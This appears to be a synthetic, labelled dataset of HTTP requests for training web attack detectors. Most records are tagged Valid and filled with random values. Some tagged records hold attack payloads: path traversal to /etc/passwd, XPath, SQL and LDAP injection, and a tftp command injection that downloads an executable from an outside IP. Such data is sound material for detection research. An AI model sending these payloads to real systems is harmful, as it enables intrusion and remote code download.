Proxy-Authorization: Basic dG90ZGgzMTpUb2hj
Authorization: heea seltmfr=o7On
Range: 73381-69805,4-176585
Referer: http://www.lu7frses.be/mYAn/8mi8ve/uoie/6wed9dho/vt1te.txt
TE: trailers,gzip,gzip
Trailer: Max-Forwards
User-Agent: oXHPfnE9wf http://www.tvHact.uk
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/7.0 www.sdiMcdb.jpg:7, 3.0 246.96.49.78
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 541 75.79.93.246 "gtmeetecTcrcgl" "Sun, 13 Nov 05 09:19:41 UTC"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 10397953831192510
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41847
Start - Id: 34297
class: Valid
PUT /C.@/tBaegin2reo/Uxp_NNeWFr6LgqmZ3/ljKK.If/oatnouaoBretsItaScea/MyL.script4KincludeJbgsoundVLMDD/ioihtriine/A8G1RU/hmernEan/o6xmfc/aSNQ_fl-7UJU7d.bin? HTTP/1.0
Content-Length: 21
Content-Language: tihegl,iiS,Inio
Content-Encoding: identity
Content-Location: http://www.nemt0amc.cz/hehja/O1sro5n2/mLnEoein/erewtepe/hhci.shtml
Content-MD5: c3FlcjRoaHdvbGVkczNwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Dec 09 02:18:34 CET
Last-Modified: Mon, 22 Sep 08 07:52:59 UTC
Host: 214.40.194.1
Connection: snFavehT
Accept: image/*, text/*, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, deflate, deflate;q=0.4, deflate;q=0.0
Accept-Language: Nwrhi-noe;q=0.7, neea-e;q=0.6, ase-seh, edinei-A, ctti-Ipce;q=0.2
Cache-Control: only-if-cached
Client-ip: 194.196.68.198
Cookie: a6rC=6hjCSyxUJ9pp
Cookie2: $Version="3"
Date: Sun, 21 Feb 10 09:04:38 GMT
ETag: W/"MIfK1cMgAyFIcMw4j"
Expect: 100-continue
From: hysea@neCr9r.com
If-Modified-Since: Sun, 07 Nov 04 20:33:58 CET
If-Unmodified-Since: Fri, 17 Apr 09 09:51:25 UTC
If-Match: "mdkn-G35pBkkqZSbfdaL"
If-None-Match: "@fZ2G6_vMIXYN12ccE"
If-Range: *
Max-Forwards: 17
MIME-Version: 7.7
Pragma: ei=eelo4
Proxy-Authorization: dooif easg=eyxlos
Authorization: eUoago kktgktms=8l8ehl
Range: -18,2241-
Referer: /ehnt.jpg
TE: trailers
Trailer: If-Range
User-Agent: joYjsahnolMsau5hes
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1417x508
Via: HTTP/4.7 142.49.75.239, 1.1 46.194.230.103
Transfer-Encoding: identity
Upgrade: posIin/2.5, mri/9.3, Tfa/9.0, sadis/4.2, bfeetp/2.9
Warning: 720 www.adln4.tiff:115 "T5aUbnb" "Sun, 26 Oct 08 21:05:18 GMT"
X-Forwarded-For: 23.54.143.100
X-Serial-Number: 437295181628210
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

elo=/s&httpsP@myW=5

End - Id: 34297
Start - Id: 1390
class: Valid
GET /noredoh5ECU1ittdbwz/c_dol0uI8n0DkfSkS6.cgi?ct8ueoot=oia%7Ercps3NiOoye6xml HTTP/1.0
Host: 238.40.59.241
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: osAwlxjr-a, nq2n-h, t-dh1rtsss, vZrihy1m-cyb9
Cache-Control: max-age=34
Client-ip: 49.160.169.51
Cookie: rtosse=eso|anaH;e3rl=rSj27einte2;eoc8id=edeifbbTnnsweSa;ngO=oU@4BGz8cXuE
Cookie2: $Version="13"
Date: Fri, 31 Oct 08 11:10:26 CET
ETag: "yLF_9eVimBS7ymwy1hq"
Expect: vmans2bc
From: 4a8k@ilaedTEuh.net
If-Modified-Since: Fri, 13 Jul 07 19:07:51 UTC
If-Unmodified-Since: Mon, 26 Dec 05 11:14:50 CET
If-Match: *
If-None-Match: "krm-@in@X8nG8yITgj"
If-Range: Wed, 13 Aug 08 22:39:45 CET
Max-Forwards: 3
MIME-Version: 4.2
Pragma: pieojr9t=2aoA
Proxy-Authorization: peo1 et1n=eacseu
Authorization: NTLM c2UxTHVsczc4bmlua3NwdGhma2k3aXVMcjlMbWVjZUVqeGRzTmVk
Range: 373155-704,-1740,72564-298
Referer: /sanr/s3eeb.cgi
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 7.1; en-ei; rv:5.4.1) Gecko/78216170
UA-CPU: x86
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 238x900
Via: HTTP/7.2 221.28.60.50:129, 2.8 179.46.45.67, 4.9 www.iadasuet.jpeg
Transfer-Encoding: deflate
Upgrade: bhgp/1.7
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 123.28.90.45
X-Serial-Number: 5490878161111
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1390
Start - Id: 21580
class: Valid
GET /UtOyoieEtacHoxr8/i0i08s9H_bvG_8/jnhpbrues7/script0aFC/MrwinntA__gC9X3openvPv/ohoDXI_YBnw/3nt19rtieni.mdb? HTTP/1.1
Host: www.ohNiyuo8.com:960
Connection: heuygak
Accept: text/html;q=0.2
Accept-Charset: us-ascii, x-mac-korean;q=0.0, x-mac-japanese
Accept-Encoding: *
Accept-Language: eoo-trecigm, Mussgf-uA2oo;q=0.1, dotr-n;q=0.4, s6t-Aee0qho;q=0.7, c8viien2-a1hheS
Cache-Control: no-transform
Client-ip: 200.137.77.135
Cookie: txtehtiiheNeh=bmas;l3wsienr=aseT ;n2bt6ecS6emj=e6uljsctal1c;UGlJR0Fy=passwd0;tot5h9c=743
Cookie2: $Version="58"
Date: Sun, 30 Apr 06 05:44:11 CET
ETag: W/"DhKnl6k1X54a0HDS96hg"
Expect: 100-continue
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Wed, 31 Oct 07 03:18:40 GMT
If-Unmodified-Since: Wed, 31 Aug 05 01:01:57 CET
If-Match: *
If-None-Match: "g.g@@54zM63eWlvddEAg"
If-Range: Tue, 21 Mar 06 04:51:11 CET
Max-Forwards: 85
MIME-Version: 7.7
Pragma: l='saiO'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: Basic OElpYXQ3OmZhZXU=
Range: -2,-697987
Referer: /erin/eaHxescr/eaicn.dll
TE: trailers,gzip
Trailer: If-Range
User-Agent: ctlx6ATeAd
UA-CPU: x86
UA-Disp: 878,5357,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0542x2765
Via: FTP/5.2 www.u5endtoo.htm:84407, 2.3 www.w1sOre.html
Transfer-Encoding: compress
Upgrade: rle/0.9, 32noar/1.9, terase/3.6, lop/4.7, lgd/8.7
Warning: 906 www.0bBaahO.html "iyyOei" "Thu, 02 Feb 06 10:40:07 UTC"
X-Forwarded-For: 125.112.206.65
X-Serial-Number: 42015
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21580
Start - Id: 46045
class: PathTransversal
GET /lgUDBKvgTRQ.wvR0/pMbcfromtTjj/eTrmDFez3qxQ%uEr/i45EZg_Qy93.l3H5WWHI/sqqe/yeeySonmkaffbtn5Fva/dgcVXA@YYucR8/qGFGCdmdiG_8Vc3Fx/OwuaoTeoh/9rFLQzCEPLgB.sh?o2wi=6Hwe&O9stRzF5icv=yGNgvvdYcY&cbEetufrsease=7wesa6vq&q8oiRvLmt=binwetzexecabnautoexec&RgdxtU=iltOleat17htier+a HTTP/1.1
Host: 195.236.24.149
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: isiri-3342;q=0.5, cp-950, x-mac-greek, windows-1255, iso-8859-7
Accept-Encoding: 
Accept-Language: Imado-ne;q=0.8, aa-8a;q=0.0, rnlnjeA3-tk;q=0.3, ahhitbiW-Rrdt;q=0.8, Fenom5tg-dc
Cache-Control: only-if-cached
Cookie: psOhmmamkrb=572;RtyrexfbtE=197350;UL@0f=632;nQkn2G9W=inputii
Date: Sun, 19 Oct 08 21:09:16 GMT
ETag: W/"s3EvMhXH@ul3lOol.4t"
From: 83r0ove@Ahear.de
If-Modified-Since: Tue, 23 Sep 08 23:22:39 GMT
If-Match: "Zr3.JMqPGLHiS7HMAS"
If-None-Match: "KDaHilOibIrbcDnZv"
If-Range: *
Max-Forwards: 1173
MIME-Version: 3.3
Pragma: no-cache
Authorization: 9ir3c dihuhu=adaeo
Referer: http://www.vfam.cz/yyevk/entb4dc/eyuin/tfeAqSe.jpeg
TE: gzip,deflate;q=0.9
Trailer: Accept-Encoding
User-Agent: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
UA-Disp: 784,6015,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3318x761
Via: 7.8 160.26.181.61
X-Forwarded-For: 0.7.36.237
----: ------------

null

End - Id: 46045
Start - Id: 25783
class: Valid
GET /e@JA8C6lFh2VE6QvOEpR.html?Wrscnsps5TOdc=l4PHH7p7Pi&ZF2htaccesnEW=1779&ea=tjUluFI&dysd=totaNoimgiscriptnc%5Cq&estI=aJ3&twEteusodwaepqn=ep1OI%40FLp&eo49ul=2734984&8otG=a6tcrnnmshcax1e&hae1oovab=5468473770 HTTP/1.0
Host: 183.122.61.8
Connection: eeeirPhs
Accept: video/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 20.96.248.211
Cookie: U9QyLOT=r6nnhodyrbe6ddst;ewhaezhgeb=141;mGS0fketcDP=her2opT
Cookie2: $Version="98"
Date: Fri, 05 Dec 08 23:27:19 CET
ETag: "TkphxNdlE_AQ8J5ftEjn"
Expect: Ioeo
From: llantq@at3ooty.biz
If-Modified-Since: Fri, 28 Nov 08 06:24:01 GMT
If-Unmodified-Since: Wed, 22 Mar 06 03:07:46 GMT
If-Match: "Ri1lqVJFNGyjLzg"
If-None-Match: "8@8uzEzXkBBf4f5rr"
If-Range: *
Max-Forwards: 060
MIME-Version: 3.7
Pragma: vtrotp='r6Sdile'
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: Digest realm
Range: 5-9302,15807-16295
Referer: /bWbI8O.jpg
TE: trailers,trailers,deflate
Trailer: Warning
User-Agent: rtlQee3 (soletk7o7P; llEzeo; dLBN6b8jq)
UA-CPU: Sparc
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: ntny/6.8 www.ooAfEs.jpg, HTTP/1.0 187.21.110.110, 69sa/9.4 195.33.209.188:4423
Transfer-Encoding: compress
Upgrade: wqn/1.7, nvnp/4.1
Warning: 825 0.153.179.180:61 "TfhhisrhLuspeaNcn" "Fri, 29 May 09 09:24:00 GMT"
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25783
Start - Id: 35767
class: XPathInjection
GET /rs-/a6aa.cfm?pnorooco1pI8=3+++or+1%3C+++++aeHhx%2FE94%2Fdnos%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D662%5D+or+3388%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&Szxoei=ne&qYMxtermbYH=A%3D3obfcj%7C&ocdSr1wj7i=ie HTTP/1.1
Host: www.lhmsaa.fr
Connection: itty6l
Accept: audio/*;q=0.8, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: g-lethe;q=0.6, janceuny-nm5, sretM-zU;q=0.4
Cache-Control: no-transform
Client-ip: 75.114.245.20
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Thu, 03 Nov 05 19:17:19 CET
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: 100-continue
From: Tzaa@hairs.be
If-Modified-Since: Wed, 20 May 09 05:42:01 UTC
If-Unmodified-Since: Sun, 04 Apr 10 11:30:12 CET
If-Match: *
If-None-Match: "v2EW69CIUg3iNHIfe92O"
If-Range: "uYqCyPZHoc7kpuw"
Max-Forwards: 577
MIME-Version: 3.7
Pragma: ha3htm=3i
Proxy-Authorization: Basic cnhhZWk6b29zVlN2
Authorization: Digest opaque="zteiR"
Range: 9042-41
Referer: http://aisp.cz/lnak/iAi0s0e/eorttt/sddm/liem8t.jpeg
TE: chunked;q=0.0,gzip;q=0.5,deflate;q=0.8
Trailer: If-None-Match
User-Agent: eteeob2hnh/8.1.1.1
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 1.3 251.181.165.92
Transfer-Encoding: deflate
Upgrade: sunttk/5.8, ubia/9.5, deoo/2.0, zOw/5.6, cxc/4.5
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35767
Start - Id: 35108
class: SqlInjection
GET /jiframeyJperl04/hXcatxUtJxmlkqDLNlW/zfS1XIpa74xj/avc3sOMxUeWGKX2VcL/bIoh/iIudtees4owtnc4wdkit/jHwindow.open9JhEcw3LZt/eji5SQAzwlQcs_BUCd.mdb? HTTP/1.1
Host: www.lcebsat.gov
Connection: agnh
Accept: audio/basic;q=0.8, video/mpeg, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress, compress
Accept-Language: Re-o2eodp;q=0.3, dErr6i-rWeax;q=0.5, n-lsa;q=0.9
Cache-Control: only-if-cached
Client-ip: 57.170.204.15
Cookie: er5ooaieHnbiabt=oek;vht6uGti=788;fycg5rOlimoxVh=aba;6lHlanaHa=4gljo;tck='UNIONALLSELECTfieldFROMmatinaWHERE''= '
Cookie2: $Version="40"
Date: Tue, 10 Apr 07 23:16:04 GMT
ETag: W/"81loHr9KD.A9I2L"
From: deweo@rtdRq.de
If-Modified-Since: Fri, 16 Jun 06 20:49:31 UTC
If-Unmodified-Since: Sun, 07 Aug 05 20:48:49 GMT
If-Match: "0zth0bZfjuUnEkixg"
If-None-Match: *
If-Range: "WGVnd4-S6@8zFHsJST"
Max-Forwards: 2
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest username="onacnday"
Range: 8683-25223,-533,7250-
Referer: /Mi44t/sDHsae/lndh2a/7ahNe2/kaaer.html
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.4 (compatible; Konqueror/3.2; Windows NT; 6seewiso; Lbeac; iiWn)
UA-CPU: Sparc
UA-Pixels: 142x4166
Via: 6.9 www.weOdcY.html, 8.6 64.172.120.169, 2.0 229.168.5.254
Transfer-Encoding: identity
Upgrade: rss/3.7, haei/8.7
Warning: 203 120.19.118.98 "fhlnSveaeersx7asnre" 
X-Serial-Number: 22984732531053558751
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35108
Start - Id: 17862
class: Valid
GET /stiiqae/OhgPo6ikinhoaNsaid5e/DtVxeiw8ie/ebtdomaeea1voeiijtu/tzg6elcf/oXtq/rhuast9ojhna/i5itg/sEh0t/e-77w26MDvZ/6zXHs@3@HuA9-ob.php?tea=9921&os9ritElqOd=sdcnije&tboe1gagEtcasn=eKdY&tSonoqHrvnnu2iE=gsq.&uiersr=oeti%24e+6bssvegt&nnA5frRinnqKtik=mZ5830O&murnTftdr=elJ&yrba=85&TspsusgtdnigpxY=ouMrg&4GbOsuYj0D.q=ahoeR%3Awgselect5fwo&oLcetcieeerlq=blaAEnenhOA&objectDS8Vz18PNG=nsorOeeetrt&habpW2=%5BOtlservicese HTTP/1.0
Host: 176.106.205.169:637
Connection: dONsst
Accept: image/*, text/html, application/postscript;q=0.4
Accept-Charset: ks_c_5601-1987, windows-1258, macintosh;q=0.4
Accept-Encoding: 
Accept-Language: mirnn-ehishL;q=0.7, GAGld-8Zd3dm, ncefpuA-l, i-rn
Cache-Control: no-store
Client-ip: 72.255.242.16
Cookie: ntirsptdxf5S=e4w50w0b;s6dhgeehopetri=<q;nunu8OoetIsryl=ionlike6;2Liunngbetsf=hyFH;eo062=Etzetlri2mns
Cookie2: $Version="90"
Date: Fri, 27 Mar 09 10:13:31 GMT
ETag: "jv2bocDD-zS@V6mm"
Expect: 100-continue
From: temygise@hhgs.com
If-Modified-Since: Sat, 06 Jan 07 15:09:18 GMT
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: *
If-None-Match: "iug7mvlNC1sGYQQ7S"
If-Range: Wed, 09 Nov 05 07:45:11 UTC
Max-Forwards: 40
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/oiato3/Raenpe.swf
Authorization: NTLM dGpsdGZ1dHQ5T3R1cmhlcGFkMGRrc2VhZDhtUmpzMkhraA==
Range: 725825-,076271-,1-
Referer: http://www.aceoe.gov/ddnm/glnMme.exe
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/3.2 (X11; U; Solaris 7.7; Rc-mm; rv:2.5.6) Gecko/71992686
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8176x316
Via: 3.2 www.esha.js, 8.6 120.186.238.29
Transfer-Encoding: deflate
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 759 www.kSU0ou.jpeg "aaeisntpaxn" "Thu, 22 Dec 05 01:03:24 UTC"
X-Forwarded-For: 112.242.155.192
X-Serial-Number: 3494344
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17862
Start - Id: 8918
class: Valid
GET /TTkP.mdb?nNgawf0Ns=e&YusrQzwtd0aq=elenetcatujecho9hj8ie%5Ds&BnodeaqY_@PSzd=6429266&RlhEwIeo5RtC=opstljtpk&nsWar1H3gt1=3713&l3XBGKYMeD=tioGgaxt4tlye HTTP/1.1
Host: www.r5ieeho.biz:440
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: hz-gb-2312, windows-874;q=0.8
Accept-Encoding: *
Accept-Language: 0or-a8b;q=0.2
Cache-Control: no-store
Client-ip: 94.217.250.252
Cookie: ad=sNf49InHUaaB
Cookie2: $Version="266"
Date: Sun, 21 Sep 08 11:17:12 GMT
ETag: W/"CuVJCTbx7_azl9gU1E"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Fri, 16 Jul 04 16:51:12 CET
If-Unmodified-Since: Fri, 08 Jun 07 11:17:02 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Sep 07 06:30:33 GMT
Max-Forwards: 9
MIME-Version: 1.1
Pragma: eLb=ielcei
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic ZW1vdWg6dG9ldW4=
Range: 7-3572
Referer: http://Tpagbo.ch/edtoiaD.cfm
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.5 (Windows; U; Win98 0.3; ua-ll; rv:9.0.4) Gecko/21868239
UA-CPU: 68000
UA-Disp: 7865,493,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3660x726
Via: 8.6 253.75.182.4, 6.8 87.34.21.94
Transfer-Encoding: compress
Upgrade: D54Tc/5.2
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8918
Start - Id: 23155
class: Valid
GET /iPGrnseTdccrfcsOi/slsmtie4ertzpa/rr/mG5BdMU7kM3wcdlHx/dg/2exdmsto/0Nwindow.opensSMux/aTglJ-k@CKZPP/anhwjeetSafrooeer/x.wxOya3OXhERwY/yeI.aspx?lH6wzeheaEtaie=lw2d&tuev=nIEp&tll1Wnz=99449&1utarttm=183596890&iKQ2xqOZunion6=45&ofn9rAHfhnren7p=IRtohodiva%40hsn9&psDdttFiitsRt=%2Bnq%24na-ta%3Eer+a%27rf&rti=25divi6cmdmochaq%26%7Cq+&m93DNYO=oeeaasUa&acdFr9=r%40z&jallaW1netcat=29966&1fSQ.a7system@b=7969 HTTP/1.1
Host: 74.151.57.247:7796
Connection: itch4i
Accept: audio/*;q=0.3, video/quicktime
Accept-Charset: iso-8859-6;q=0.3, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 55.96.95.22
Cookie: lvuiamaa2fdo=1uupdateidphp;tci=3394195687;aWhq=mocha>
Cookie2: $Version="573"
Date: Tue, 03 Jun 08 22:58:48 GMT
ETag: W/"DoQ3O1.-wYoAiKs"
Expect: srvh=dslq;Lte6owo
From: aadN@latousamhh.uk
If-Modified-Since: Tue, 11 Jan 05 11:53:21 CET
If-Unmodified-Since: Fri, 24 Sep 04 07:51:39 GMT
If-Match: "ZHIisavjdUqi64au"
If-None-Match: *
If-Range: *
Max-Forwards: 892
MIME-Version: 4.6
Pragma: uisa='e'
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: E8Cnkm 0ahswe=rioe2w
Range: -362684,26-
Referer: http://heyu7.st/nEliaru/pdyg8eo/sptte.jsp
TE: trailers,trailers
Trailer: User-Agent
User-Agent: smsmho (o4DPvS4QJD; 7rSIozFF67)
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 293x103
Via: 9.6 104.106.194.13:11
Transfer-Encoding: gzip
Upgrade: ohoat/3.5, rmvl/7.0
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 179.20.58.194
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23155
Start - Id: 43576
class: OsCommanding
GET /qEIE-uCw68ndZz/t8i/etouwn/YddcRiswSs8As/emoshahavyloi/a-3H1ODwrR-h7TKAK/de7x1eclhid/cdibToehmt.png?MKi8ljRH=oddwbtist&felo0y=tftp+-c+++get+++++218.162.237.231%3A%2Fis%2Flldeelet.exe+++%7C&Notrnlens=677&GRxJ5G=%3Btf%5Ddfns+Nhh&0nalb2ul=T&dUHE4eebue=%3BO&hHtmpt=h3%3A&VQcL8pcwindow.open=nooorhqtre&AeASdi=rfYTsW%40BdKUd&dieia2ant=27 HTTP/1.0
Host: www.sttIhsaJ05.st
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: sw7o-eeODa;q=0.5, yae-f5v2sjAi, neiet-tn7me, Cbahn-hsesTsv
Cache-Control: min-fresh=41
Client-ip: 147.240.160.139
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="95"
Date: Mon, 06 Feb 06 03:13:59 GMT
ETag: "z@VDwv-LBAonIc6"
Expect: nhNcolo
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sun, 25 Jun 06 04:37:30 UTC
If-Unmodified-Since: Mon, 01 May 06 19:54:17 UTC
If-Match: *
If-None-Match: *
If-Range: "wFGwu6f1XA-FIRqrK9c"
Max-Forwards: 6245
MIME-Version: 0.2
Pragma: gn5dym=wVmenor
Authorization: Basic cDBzbmVwOmZ5c3Rj
Range: 08647-744
Referer: /nzdeeya/heeAoeh/ieiNz/iIhinxa/cs4toeIm.mpeg
TE: trailers
Trailer: Host
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 1.6; al-le; rv:5.0.7) Gecko/11799274
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 1267x2165
Via: 1.7 www.jmiteo7h.css, 2.4 116.251.164.25, HTTP/5.7 www.otsPhir.htm:059
Transfer-Encoding: gzip
----: -----------------------------------------

null

End - Id: 43576
Start - Id: 394
class: Valid
GET /qf_X5PqzF-f/aSzcP8gl7X/i0n/nntnhjtaG/yRzx_-xtmv/dRi/Pde9n1cihfjha.sh? HTTP/1.0
Host: www.yfhHn.uk
Connection: close
Accept: */*;q=0.0
Accept-Charset: ks_c_5601-1987;q=0.1, big5;q=0.6, iso-8859-5;q=0.4, x-mac-japanese, windows-1250;q=0.0
Accept-Encoding: compress;q=0.6, deflate;q=0.7, deflate, deflate;q=0.4, compress
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 80.119.213.130
Cookie: h0must1a9utettE=967;mcDX.11V4=329;aangOixbW8m2e=7727397;voetdas=yxOdter d
Cookie2: $Version="619"
Date: Sat, 17 Apr 04 04:46:13 GMT
ETag: W/"AwOLswOcN9pF3VDj7D3g"
Expect: 100-continue
From: rPtoKwaw@nOdai.biz
If-Modified-Since: Thu, 07 Jun 07 17:22:18 CET
If-Unmodified-Since: Fri, 29 Aug 08 14:39:22 CET
If-Match: "PHx_aFUk5Db_t1OCvIB"
If-None-Match: "b158mBWCKlB6B6X02W6"
If-Range: Wed, 29 Dec 04 17:29:02 UTC
Max-Forwards: 7684
MIME-Version: 2.4
Pragma: hprt3sln=tQtne5de
Proxy-Authorization: Digest nonce
Authorization: NTLM dGVvZG51VGxob3Q4c2FuZ3RlMjM3cnJqaGVkVGV5aDFpaEg2bXRlaXQ5cm8=
Range: 63476-77033,-529,5-
Referer: /soeeC/wEeteuL/ctxtnoa/1wrU6/Mhnso3.mdb
TE: gzip;q=0.1,deflate;q=0.2,deflate;q=0.9
Trailer: Range
User-Agent: meht (sQzrPpE; lyqOTORHh; aXan.tb; octfJBM; cXxd1m7q@p)
UA-CPU: Sparc
UA-Disp: 6142,708,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7545x2141
Via: 8.4 www.cia9lsOn.jpeg
Transfer-Encoding: compress
Upgrade: sajgfN/7.8, n2wam/2.4
Warning: 939 www.gttieo.css "to6kdeaosjuise9qIc" "Sun, 24 Oct 04 22:57:30 GMT"
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 5470041402
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 394
Start - Id: 10309
class: Valid
GET /aoshdlmppneehH/tpCy5N5.swf?ivl65ddos=3265253571&ea5ea8eC=nF13H-&05v0dV=c8ipsss%3F&su5seceir=Sngtmyo2qd+&bR=i&uyr=414503797&loeM=l5en HTTP/1.0
Host: www.efqnoar.net
Connection: 3jmxtd2
Accept: */*
Accept-Charset: iso-8859-3;q=0.0, shift_jis, iso-8859-2;q=0.4
Accept-Encoding: gzip
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8
Client-ip: 42.80.49.249
Cookie: iedtAamhectrho=dyfE5;ZBFQ3tEc8Os_=h6reWeWr;soekRs=ewkaiemnohRebiWi;1sneocechneo=group bytperlsizbe
Cookie2: $Version="3"
Date: Mon, 05 May 08 20:21:24 CET
ETag: W/"EYezGROZhzumkOacy"
Expect: 100-continue
From: trNaAn@atrmbi.com
If-Modified-Since: Fri, 09 Mar 07 02:07:31 UTC
If-Unmodified-Since: Sun, 30 Mar 08 05:08:08 GMT
If-Match: "Y5kyXh43Ss3dtRUOVQP7"
If-None-Match: *
If-Range: *
Max-Forwards: 462
MIME-Version: 1.3
Pragma: e='e'
Proxy-Authorization: NTLM bnRUZzNjV29lcmRvdWlycmhFaW10b0VGZWlSbW5lT3JvbGlyb2VtaDNhYWNtbmc=
Authorization: Digest username="ol2CinNr"
Range: 12-5596
Referer: /ehRsme/ywsevl5/crcvgak.msf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.0 (Windows; U; Win 9x 9.8; t2-ed; rv:6.3.7) Gecko/45373438
UA-CPU: x86
UA-Disp: 2081,300,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 032x7737
Via: afgt/6.8 www.99htf.css, sAduc/1.3 48.215.150.133, 8.8 113.227.52.114:0607
Transfer-Encoding: gzip
Upgrade: pnge/0.2
Warning: 089 77.21.70.73 "oeaacxztie0eaee7elv" "Wed, 05 Oct 05 21:11:47 UTC"
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 557318142
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10309
Start - Id: 37467
class: LdapInjection
GET /7lsn/rmxIjrg3g9-k8n8Im/sKBlzf43sZ/mJoQE3SDIJ.UKYa/uMtracbowsOmjheem/t0nX@lYWXIsFr6-pr/9R7c11_qweSz/D-9-XD/tz/zsnHiiarbops9a6a.dll?tsrgnweorht=5172252120&w1mfoepsCxta3=tvg&hqf=oA6YMn0BeB&.372@n=vorelsaxtzskecn&pafrcaieA8href=l+qv&bkNXG=a&eia1E1shesmlwi=iraep9eo HTTP/1.0
Host: 45.200.148.110:25876
Connection: keep-alive
Accept: */*
